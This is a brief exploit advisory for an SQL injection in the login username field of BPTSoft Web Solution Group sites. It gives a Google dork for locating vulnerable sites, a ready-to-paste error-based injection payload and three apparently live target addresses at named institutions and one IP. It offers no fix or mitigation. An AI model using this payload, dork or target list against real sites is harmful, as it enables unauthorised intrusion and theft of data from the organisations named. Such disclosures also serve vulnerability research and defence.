############################### HUT CNIS ############################# # Exploit Title: BPTSoft Web Solution Group SQL INJECTION Vulnerability # Date: [2012/1/1] # Author: S.Azadi # Google Dork: site:.ir intext:Copyright 2005-2009 BPTSoft Web Solution Group # Vulnerability Type: SQL Injection # Version: 2005-2009 #--------------------------------------------------------------------- Technical Details: - SQL INJECTION: There is a SQLI vulnerability in “Default.aspx” , in username textbox. PoC: http://sitename/Default.aspx || Enter in username textbox: ' and 1=convert(int,(select @@version))-- sample code for username textbox: ' and 1=convert(int,(select @@version))-- http://fish.ghec.ac.ir/Default.aspx http://95.82.105.54/Default.aspx http://salary.yazduni.ac.ir/Default.aspx # # # ###########- HUT Center for Network and Information Security -##########